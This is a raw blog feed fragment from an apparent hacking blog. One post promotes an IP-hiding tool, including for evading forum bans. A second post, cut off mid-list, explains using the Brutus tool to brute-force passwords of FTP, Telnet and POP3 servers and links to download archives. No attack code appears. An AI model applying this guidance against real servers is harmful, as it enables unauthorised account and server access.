&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Anonymous Web Surfing&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;
Click Hide IP button and you will be assigned fake IP addresses,&amp;nbsp;&lt;span class="IL_AD" id="IL_AD6" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;preventing&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;others from getting your true IP when surfing the Internet.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;Protect Your&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;Identity&lt;/blockquote&gt;&lt;br /&gt;
Surf anonymously to&amp;nbsp;&lt;span class="IL_AD" id="IL_AD7" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;prevent&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;hackers or identity thieves from monitoring your web activity or intercepting your personal information such as your financial information.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;Choose IP Country&lt;/blockquote&gt;&lt;br /&gt;
You can select to use fake IP from different countries via "Choose IP Country" option and can Check IP directly.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;Send Anonymous E-mails&lt;/blockquote&gt;&lt;br /&gt;
Hide your IP in E-mail headers. Be protected while sending e-mails via Yahoo!, Hotmail, GMail.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;Un-ban Yourself from Forums and Restricted Websites&lt;/blockquote&gt;&lt;br /&gt;
Use Super Hide IP to&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;change your&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;IP which allows you to access any forums or websites that has ever banned you.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static; text-decoration: none !important;"&gt;DOWNLOAD LINK&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="outline: none medium; text-align: center;"&gt;&lt;a href="http://downloadsrealhackings.googlecode.com/files/Super..v3.1.0.6.rar" style="color: blue; outline: none medium;"&gt;Download Super Hide IP 2.0.7.6 Now&lt;/a&gt;&lt;/div&gt;&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;HOW SUPER HIDE IP LOOKS&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
1. Using original IP,That is before hiding the actual IP&lt;br /&gt;
&lt;br /&gt;
&lt;div style="outline: none medium; text-align: center;"&gt;&lt;img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiptXZySsgLfz3dtsTlDDPGVfa6k8yhCGBo2C_PMCqDNo_2RZ1iwD_lTNKfUkX5r6mDIudCG1McUcgELPhIwwRm_O3I1HmU9Os_1gDpENLEKnJOegm_R5Q1Qmc8JEBQWqkgSD6L8Kvx_vM/s400/Super+Hide+IP.png" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="400" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
2. By using Super Hide ip,The IP is being changed to a fake one.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="outline: none medium; text-align: center;"&gt;&lt;img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeBKDuiqmWdan3ABbf8lB2CQBnyOt5gwnIl_MQWpYOLEhf3ZN6lGT91I30Ca-9HwgfgGif_15uxNt5wNMA04itmE96wDW_9uQLvlIe0e9CyVorIOmMdurvswzpaSoPcxjOMnnAeAPA9Sg/s400/Super+Hide+IP1.png" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="400" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;MAIN ADVANTAGE&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
You can also set your IP to change regularly in specific time interval which will increase your security so that no one will intrude in to your system and thus keep away from all IP based attacks&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
Please pass your comments if you found this article useful..&lt;/div&gt;&lt;div style="clear: both; outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="post-footer" style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;div class="post-footer-line post-footer-line-1" style="outline: none medium;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-family: Philosopher, arial, serif; font-size: 16px; outline: none medium;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcZ98M1vMxTxWGP42-mVFvJdS1i-50h-t5RVSD9b57cbHbmOfxj6QJxz9jAGgYojTsbI3mtvm23t0NvJSpTqxle9crkgR1z_EQwzBNBo0SHiaQI7FRqrSIxm3cHo2LF8GvfndUL6P_nP0/s72-c/anonymous1.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><author>noreply@blogger.com (sachin rajak)</author></item><item><title>Brute Force Attack To Hack Passwords Of Servers Using Brutus</title><link>http://latest-cracker.blogspot.com/2012/06/brute-force-attack-to-hack-passwords-of.html</link><category>ip address</category><category>learn hacking</category><category>network hacking</category><category>password hacking</category><category>tricks</category><pubDate>Fri, 15 Jun 2012 16:56:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-7891543643515976736.post-3863691030711533880</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="post-body entry-content" id="post-body-6839245618808364386" style="font-family: Philosopher, arial, serif; font-size: 17px; line-height: 22px; margin: 0px; outline: none medium; padding: 0px; text-shadow: rgb(255, 255, 255) 0px 1px 1px;"&gt;&lt;div id="mishal" style="background-color: white; background-position: initial initial; background-repeat: initial initial; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 5px solid rgb(68, 68, 68); bottom: 20%; float: left; margin-left: -97px; outline: none medium; position: fixed;"&gt;&lt;div class="name" style="clear: left; float: left; outline: none medium; padding: 5px;"&gt;&lt;iframe allowtransparency="true" class="twitter-share-button twitter-count-vertical" frameborder="0" scrolling="no" src="http://platform.twitter.com/widgets/tweet_button.1338995330.html#_=1339759357269&amp;amp;count=vertical&amp;amp;id=twitter-widget-0&amp;amp;lang=en&amp;amp;original_referer=http%3A%2F%2Fwww.realhackings.com%2F2011%2F08%2Fbrute-force-attack-to-hack-passwords-of.html&amp;amp;size=m&amp;amp;text=Brute%20force%20attack%20to%20hack%20passwords%20of%20servers%20using%20Brutus%20%7C%20REAL%20HACKINGS%20%7C%20viruses%20%7C%20computer%20%7C%20tricks%20%7C%20tips%20%7C%20securities%20%7C%20encryption&amp;amp;url=http%3A%2F%2Fwww.realhackings.com%2F2011%2F08%2Fbrute-force-attack-to-hack-passwords-of.html" style="height: 62px; outline: none medium; width: 59px;" title="Twitter Tweet Button"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div class="name" style="clear: left; float: left; outline: none medium; padding: 5px;"&gt;&lt;iframe allowtransparency="true" frameborder="0" scrolling="no" src="http://www.facebook.com/plugins/like.php?href=http://www.realhackings.com/2011/08/brute-force-attack-to-hack-passwords-of.html&amp;amp;send=false&amp;amp;layout=box_count&amp;amp;show_faces=false&amp;amp;width=55&amp;amp;action=like&amp;amp;font=arial&amp;amp;colorscheme=light&amp;amp;height=65" style="border-style: none; height: 65px; outline: none medium; overflow: hidden; width: 55px;"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div class="name" style="clear: left; float: left; outline: none medium; padding: 5px;"&gt;&lt;div id="___plusone_0" style="background-color: transparent; border-style: none; display: inline-block; float: none; font-size: 1px; height: 60px; line-height: normal; margin: 0px; outline: none medium; padding: 0px; vertical-align: baseline; width: 50px;"&gt;&lt;iframe allowtransparency="true" frameborder="0" hspace="0" id="I1_1339759355243" marginheight="0" marginwidth="0" name="I1_1339759355243" scrolling="no" src="https://plusone.google.com/_/+1/fastbutton?bsv=pr&amp;amp;url=http%3A%2F%2Fwww.realhackings.com%2F2011%2F08%2Fbrute-force-attack-to-hack-passwords-of.html&amp;amp;size=tall&amp;amp;count=true&amp;amp;origin=http%3A%2F%2Fwww.realhackings.com&amp;amp;hl=en_GB&amp;amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3DPR_qhj6nR2Q.en_GB.%2Fsv%3D1%2Fam%3D!rFmBCPi40VqIDfp2cA%2Fd%3D1%2Frs%3DAItRSTMO3NEPzP3vMajdLn4SlLCfBlygaQ#id=I1_1339759355243&amp;amp;parent=http%3A%2F%2Fwww.realhackings.com&amp;amp;rpctoken=177854789&amp;amp;_methods=onPlusOne%2C_ready%2C_close%2C_open%2C_resizeMe%2C_renderstart" style="border-style: none; height: 60px; left: 0px; margin: 0px; outline: none medium; position: static; top: 0px; visibility: visible; width: 50px;" tabindex="0" title="+1" vspace="0" width="100%"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="name" style="clear: left; float: left; outline: none medium; padding: 5px;"&gt;&lt;iframe allowtransparency="true" frameborder="0" height="60" id="iframe-stmblpn-widget-1" scrolling="no" src="http://badge.stumbleupon.com/badge/embed/5/?url=http%3A%2F%2Fwww.realhackings.com%2F2011%2F08%2Fbrute-force-attack-to-hack-passwords-of.html" style="border-width: 0px; margin: 0px; outline: none medium; overflow: hidden; padding: 0px;" width="50"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div class="name" style="clear: left; float: left; outline: none medium; padding: 5px;"&gt;&lt;span class="db-wrapper db-clear db-medium" style="border: 0px; display: inline-block; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; margin: 0px; outline: none medium; padding: 0px; vertical-align: bottom; zoom: 1;"&gt;&lt;span style="border: 0px; margin: 0px; outline: none medium; padding: 0px;"&gt;&lt;span class="db-container" style="border: 0px; margin: 0px; outline: none medium; padding: 0px;"&gt;&lt;span class="db-body db-medium" style="background-color: transparent; background-image: url(http://widgets.digg.com/img/button/diggThisMedium_3.0cab1d23.png); background-position: 0px 0px; background-repeat: no-repeat no-repeat; border: 0px; display: inline-block; height: 68px; margin: 0px; outline: none medium; padding: 0px; text-align: center; width: 54px; zoom: 1;"&gt;&lt;span class="db-count" style="border: 0px; color: #403f07; display: block; font-size: 16px; font-weight: bold; height: 29px; line-height: 1; margin: 0px; outline: none medium; overflow: hidden; padding: 11px 5px 0px; width: 44px;"&gt;1&lt;/span&gt;&lt;a class="db-anchor" href="http://www.blogger.com/post-edit.g?blogID=7891543643515976736&amp;amp;postID=3863691030711533880&amp;amp;from=pencil" style="border: 0px; color: blue; cursor: pointer; display: block; height: 24px; margin: 0px auto; outline: none medium; overflow: hidden; padding: 0px; text-decoration: underline; text-indent: -10000px; width: 46px;"&gt;digg&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div dir="ltr" style="outline: none medium;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; outline: none medium; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eELKCQ4KPXwOAzZ3OnbL2TNkXbWj5qs-D7PVaXp9FkZIGJrotiAiaEcBhmEaaIuOOXkLIqiuZHzkEjQSTpNIybvgJJz4gEPvPYlpwG4PxYxt-TtUGcRNDgiTEdA6ClcAoB8fEWGQKtM/s1600/p.jpg" imageanchor="1" style="clear: right; color: blue; float: right; margin-bottom: 1em; margin-left: 1em; outline: none medium;"&gt;&lt;img border="0" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5eELKCQ4KPXwOAzZ3OnbL2TNkXbWj5qs-D7PVaXp9FkZIGJrotiAiaEcBhmEaaIuOOXkLIqiuZHzkEjQSTpNIybvgJJz4gEPvPYlpwG4PxYxt-TtUGcRNDgiTEdA6ClcAoB8fEWGQKtM/s200/p.jpg" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;I believe all are familiar with Brute force attacks and we have already discussed some brute force attacks to hack gmail passwords.You can also read this&amp;nbsp;&lt;a href="http://www.realhackings.com/2011/08/hacking-gmail-using-brute-force-attack.html" style="color: blue; outline: none medium;" target="_blank"&gt;how to hack gmail by brute force&lt;/a&gt;.But here, we are doing something different.Actually the technique we are using is Brute force only.But this is all about hacking passwords of servers and the tool we are using is called Brutus.&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;br style="outline: none medium;" /&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;&lt;span class="IL_AD" id="IL_AD1" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static; text-decoration: none !important;"&gt;DOWNLOAD LINK&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;div style="outline: none medium; text-align: center;"&gt;&lt;a href="http://downloadsrealhackings.googlecode.com/files/Brutrealhackings.rar" style="color: blue; outline: none medium;"&gt;CLICK HERE TO DOWNLOAD BRUTUS&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;Extract all the files from the&amp;nbsp;&lt;span class="IL_AD" id="IL_AD3" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;downloaded&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;archive and open Brutus.you can see a window like this&lt;/div&gt;&lt;div style="font-family: inherit; outline: none medium; text-align: justify;"&gt;&lt;br /&gt;
&lt;div style="outline: none medium; text-align: center;"&gt;&lt;img border="0" height="469" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoegXL95zxXykbjyvUSEDDwdfs1l5_0Xjj8Vw206ZXsqXwZbjY92_O4b-YA3waJjr0k0z-hfsnB1qGnYk0_3hXfNyrgxMFeAFoa9VhWz1pEcMXGLYbyWRz4j7RBHlFyYNVmVWk4G1rTzM/s640/bruteforce.png" style="-webkit-box-reflect: below 0px -webkit-gradient(linear, 0% 0%, 0% 100%, from(transparent), color-stop(0.7, transparent), to(rgba(0, 0, 0, 0.0976563))); -webkit-transition: all 0.5s ease; margin: 0px; max-width: 100%; opacity: 1; outline: none medium; padding: 0px;" width="640" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;What does Brutus do?&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
In simple terms, Brutus is an online or remote password cracker. More specifically it is a remote interactive authentication agent. Brutus is used to recover valid access tokens (usually a username and password) for a given&amp;nbsp;&lt;span class="IL_AD" id="IL_AD2" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;target system&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;. Examples of a supported&amp;nbsp;target system&amp;nbsp;might be an FTP server, a password protected web page, a router console a POP3 server etc. It is used primarily in two contexts :&lt;br /&gt;
&lt;br /&gt;
· To obtain the valid access tokens for a particular user on a particular target.&lt;br /&gt;
· To obtain any valid access tokens on a particular target where only target penetration is required.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;What is a target?&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Well that depends on you. As far as Brutus is concerned a target is a remote system and possibly a remote user on a remote system, there is more. To engage any given target we require an attack method, generally we only perform one type of remote attack - that is we attempt to positivley authenticate with the target by using a number of access token combinations. A target may provide no available attack methods, it may provide one or it may provide several.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;What is an attack method?&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
In the context of Brutus, it is a service provided by the target that allows a remote client to authenticate against the target using client supplied credentials. For instance a UNIX server sat on a network somewhere may be offering Telnet and FTP services to remote users. Both telnet and FTP require the remote user to authenticate themselves before access is granted. For both these services the required credentials are usually a username and a password, therefore we have two available attack methods : FTP or Telnet. Some target systems will provide no opportunity for attack (at least not a remote authentication attack), perhaps they offer no remote services, perhaps they only offer anonymnous remote services (that require no authentication) or perhaps they offer authenticated remote services but use mechanisms to&amp;nbsp;&lt;span class="IL_AD" id="IL_AD4" style="background-attachment: scroll !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat repeat !important; border-bottom-color: rgb(12, 12, 242) !important; border-bottom-style: dotted !important; border-bottom-width: 1px !important; color: #0c0cf2; cursor: pointer !important; display: inline !important; float: none !important; outline: none medium; padding: 0px 0px 1px !important; position: static;"&gt;prevent&lt;span class="IL_AD_ICON" style="background-attachment: scroll; background-image: url(http://resources.infolinks.com/static/icons/ilblue.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; cursor: pointer !important; display: inline !important; float: none !important; margin: 0px !important; outline: none medium; padding: 0px 16px 0px 0px !important; position: static !important;"&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;authentication attacks such as account lockout or one time passwords of some sort.&lt;br /&gt;
&lt;br /&gt;
&lt;u style="outline: none medium;"&gt;&lt;b style="outline: none medium;"&gt;Which attack method is best?&amp;nbsp;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
Again, that depends on some factors which may include :&lt;br /&gt;
&lt;blockquote style="-webkit-box-shadow: rgb(221, 221, 221) 4px 4px 4px; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirGf3RnCW_xZHZxBiGVAs1GSdKBS1sanmUAaoVjQGVgjYDp22Dx9-Zgb96SwA_wew2lDWm7UssjS9OchpDAmUw6I_VxzAiCdcqc1afEEzWUuaK2YcEVl2QhcoLAK8trJVNy_lWgWQTjN8/s1600/blockquote+black.jpg); background-repeat: repeat repeat; border-bottom-left-radius: 6px; border-bottom-right-radius: 6px; border-left-color: rgb(153, 0, 0); border-left-style: solid; border-left-width: 4px; border-top-left-radius: 6px; border-top-right-radius: 6px; color: #dddddd; font-family: Georgia, 'trebuchet ms', tahoma, Verdana, Arial, sans-serif; font-size: 19px; font-style: italic; margin: 5px; outline: none medium; padding: 0px 20px 0px 15px;"&gt;&lt;ul style="outline: none medium;"&gt;&lt;li style="outline: none medium;"&gt;&amp;nbsp;Is the target service available to any remote system? (Yes is good)&lt;/li&gt;
